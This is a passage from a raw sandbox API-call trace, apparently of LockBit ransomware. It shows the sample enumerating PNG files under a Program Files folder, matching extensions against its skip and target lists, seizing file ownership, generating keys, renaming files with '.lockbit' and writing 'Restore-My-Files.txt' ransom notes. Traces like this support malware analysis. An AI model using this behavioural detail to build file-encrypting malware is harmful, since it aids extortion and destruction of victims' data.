lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.407] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.407] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.407] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.407] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png") returned=".png" [0080.407] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.407] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.407] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.408] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.408] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.408] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png.lockbit") returned 95 [0080.409] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.412] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.412] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.413] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.413] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.413] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.413] RtlFreeAnsiString (AnsiString="\\") [0080.413] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0080.413] malloc (_Size=0x200) returned 0x77d800 [0080.413] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.413] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.413] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.414] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.414] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.414] CloseHandle (hObject=0x3ac) returned 1 [0080.414] free (_Block=0x77d800) [0080.414] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.415] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.415] malloc (_Size=0x40068) returned 0x3d70048 [0080.415] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5025) returned 1 [0080.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.416] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.419] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.419] malloc (_Size=0xd4) returned 0x1ff1e60 [0080.419] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd4, FileInformationClass=0xa) returned 0x0 [0080.420] free (_Block=0x1ff1e60) [0080.420] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.420] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.420] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.420] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe64ba3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe64ba3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.420] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.420] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0080.420] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.420] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.420] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.420] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.420] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.421] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.421] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.421] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.422] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.422] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.423] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.423] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.423] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.423] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.423] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.423] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.423] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.423] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.423] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.423] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.423] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.423] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0080.423] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0080.423] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.423] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png") returned=".png" [0080.423] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.424] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.424] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.424] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.425] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.425] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png.lockbit") returned 101 [0080.425] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.429] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.429] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.429] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.429] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.430] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.430] RtlFreeAnsiString (AnsiString="\\") [0080.430] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0080.430] malloc (_Size=0x200) returned 0x77d800 [0080.430] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.430] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.430] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.430] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.431] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.431] CloseHandle (hObject=0x3c0) returned 1 [0080.431] free (_Block=0x77d800) [0080.431] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.431] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.431] malloc (_Size=0x40068) returned 0x3df0008 [0080.431] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3118) returned 1 [0080.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0080.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0080.432] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.435] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.435] malloc (_Size=0xe0) returned 0x1ff1e60 [0080.435] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xe0, FileInformationClass=0xa) returned 0x0 [0080.436] free (_Block=0x1ff1e60) [0080.436] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.436] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.436] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.436] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe64ba3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe64ba3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.436] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.436] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.436] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0080.436] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.436] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.436] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.437] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.437] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.438] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.438] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.438] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.438] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.438] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.438] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.438] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.438] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0080.438] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0080.438] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.438] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png") returned=".png" [0080.439] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.439] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.439] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".dbc", 